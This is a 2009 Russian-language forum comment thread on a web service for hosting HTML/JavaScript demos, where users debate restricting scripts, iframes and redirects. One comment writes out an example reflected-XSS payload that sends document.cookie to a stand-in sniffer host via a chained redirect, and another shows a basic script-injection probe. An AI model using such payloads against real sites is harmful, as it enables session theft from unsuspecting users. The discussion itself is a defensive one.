Freem15 июн 2009 в 09:33

Source.bz — Сервис демонстраций

1 мин

+18

внесу в закладки, неплохо, может быть запретить javascriptы всяких редиректов и т.д., если сервис станет популярным, то, допустим на фрилансе говоришь заказчику — я хочу вот так вот demopreview.xexo.info/demo/view/b7c336729412877c4b6ffbef8d3a946e.html, а там бац, использование пассивной XSS какого-нибудь сайта (небойтесь, там всего-лишь редирект на хабр).

Freem 15 июн 2009 в 09:54

Как раз составлял список exception'ов

Freem 15 июн 2009 в 09:55

спасибо

Morfi 15 июн 2009 в 09:56

Ээ, как вы представляете там XSS?

Freem 15 июн 2009 в 10:00

Ну редирект на другой ресурс. Грубо на: site.com/search.php?q="><sсript>alert('КуКу')</sсript>

Rulexec 15 июн 2009 в 10:01

ну допустим кто-то нашёл XSS на Yandex (что-нибудь аля shop.yandex.ru/?category="><script>window.location='http://sniff-here.com/?'+document.cookie</script>), т.е. кто зайдёт туда у того угонятся кукисы, и в этом сервисе создать демонстрацию:

<script>
window.location='http://shop.yandex.ru/?category="><script>window.location=\'http://sniff-here.com/?\'+document.cookie</script>';
</script>

Сначала редирект на XSS, а с XSS редирект на снифер с куками.

Morfi 15 июн 2009 в 10:08

Это уже XSS у Yandex.
С такойже простотой может человек использовать и .narod.ru и ещё много мест где выложить свой html.
И тут запрещать что то нет смысла, во первых javascript очень гибкий язык и любые запреты можно будет обойти а во вторых это уже ограничивает свободу на этом ресурсе (например я не смогу выложить пример с document.cookie или window.location если их запретят)

Rulexec 15 июн 2009 в 10:11

ну это да, тогда сдаюсь :(

grdigger 15 июн 2009 в 09:56

+ запретить iframe и тому подобное, тоже из-за безопасности и что бы не было рекламы с кучей попапов.

tenshi 15 июн 2009 в 10:06

и сделать сервис совсем бесполезным? XD

grdigger 15 июн 2009 в 10:13

а вы хотите получать ссылку на работу и ловить кучу попапов? да и iframe редко лоя хороших вещей использутеся.

SlamJam 15 июн 2009 в 11:07

По-моему, если вам дают ссылку на работу, а вы там увидите кучу попапов, то вы уже можете составить мнение о человеке, который вам дал такую ссылку. Некачественные источники отсеются. Это естественный отбор.

Freem 15 июн 2009 в 10:14

интересно, а если кто хочет показать пример именно с iframe, frameset и т.п.? Думаю просто не нужно тупо ходить по всем ссылкам которые встречаешь. Это ведь может провернуть кто угодно и на своем хомяке. Хотя заставил задуматься, да.

tenshi 15 июн 2009 в 10:00

без аналитикса совсем никак?

Freem 15 июн 2009 в 10:02

Если очень критично могу убрать или поставить другое что-нибудь.

tenshi 15 июн 2009 в 10:13

я к тому, что иногда требуется полный контроль над страницей, а не только над внутренностями body.
например, подключить xslt, прописать xmlns, мету для ie8…

Freem 15 июн 2009 в 10:16

А если это делать в конструкторе (справа, в сером div'е), будет достаточно? Старался максимально упростить процесс верстки.

tenshi 15 июн 2009 в 18:55

проще просто сделать пресет с базовым хтмл и поставить курсор внутрь боди…

Freem 16 июн 2009 в 08:06

Думаю, наверное к этому и приду

grdigger 15 июн 2009 в 10:18

можно сделать что то типа такого: грузится страничка с iframe src= «url» и url заменяется на iframe.html с вашего сервера. и рядом ссылка вида «Если хотите посмотреть с включеным iframe жмякните сюда». Ну и для js тож самое можно, что б пользователь сам выбирал что ему смотреть.

Morfi 15 июн 2009 в 10:29

Зачем такие сложности то?
Вы поупапов боитесь? А на сайт который в первый раз заходите, не боитесь поупапов?

Тут максимум удобности для разработчика.

grdigger 15 июн 2009 в 11:47

угу, безумно боюсь, так боюсь что аж кушать не могу. попап привел для примера. можно засунуть любую гадость начинаю от adware заканчивая чем угодно. советую взять за правило, что приложения должно быть сначала безопастным для пользователя и только потом удобным.

Morfi 15 июн 2009 в 12:17

А если человек на своем хостинге выложит такую страницу? Хостерам тоже фильтровать все файлы пользователя на iframe и поупапы?

grdigger 15 июн 2009 в 12:22

мы сейчас говорим о сервисе который сделал Freem, а не о каком то гипотетическом хостинге.

Morfi 15 июн 2009 в 12:32

Я просто имею ввиду тут не нужны ограничения, это только усложнит пользование сервисом но безопасность почти не увеличит.

grdigger 15 июн 2009 в 12:59

дело ваше, я всего лишь изложил свою точку зрения и вариант решения.

Freem 15 июн 2009 в 10:22

Простите, допустил не простительную оплошность, скоро все верну на место.

Freem 15 июн 2009 в 10:38

Ух. всё)

Freem 15 июн 2009 в 10:46

На счет ограничений по Javascript, посмотрите на этот код. Я право, не знаю как с ним бороться. Посему накладываю ответственность, на автора, а также на выложившего ссылку для публичного или личного доступа

Rulexec 15 июн 2009 в 10:49

вроде как ничего не произошло :)

javascript://xn--alert('')-11ha1ib/ какой-то

Freem 15 июн 2009 в 10:50

Браузер? У меня Опера10b. Работает

Freem 15 июн 2009 в 10:52

Помотрел FF не собрал код, IE собрал

Freem 15 июн 2009 в 10:49

опять же, глупо будет запрещать подтягивать внешние JS (те-же фреймворки)

Freem 15 июн 2009 в 11:07

Пошел смотреть kcaptcha. Подом подумал, что нет ничего проще как с помощью нативного проView, забивать данные в поле капчи нужные данные)))
всётакие ее и поставлю)

Freem 15 июн 2009 в 11:08

аут. С помощью нативного преView, забивать нужные данные в поле капчи )))

NickMitin 15 июн 2009 в 14:45

DOCTYPE в выпадайке?

Freem 16 июн 2009 в 08:05

Подумаю, в выпадайке)

danilissimus 15 июн 2009 в 15:13

Хабраэффект го! :)

MagaSoft 15 июн 2009 в 16:05

Хьасан, суна хаар хьо Iийра воций цхьаъ ца дича ;-)
Дала аьтто бойл!

dasty 15 июн 2009 в 22:08

Вы ошиблись интернетом

Freem 16 июн 2009 в 07:43

О! Дел рез хийл!

MTonly 15 июн 2009 в 22:09

Нажатие клавиши Tab полезно перехватывать и вставлять горизонтальный отступ (как в обычных редакторах кода), иначе сервис можно будет использовать только в режиме копирования/вставки.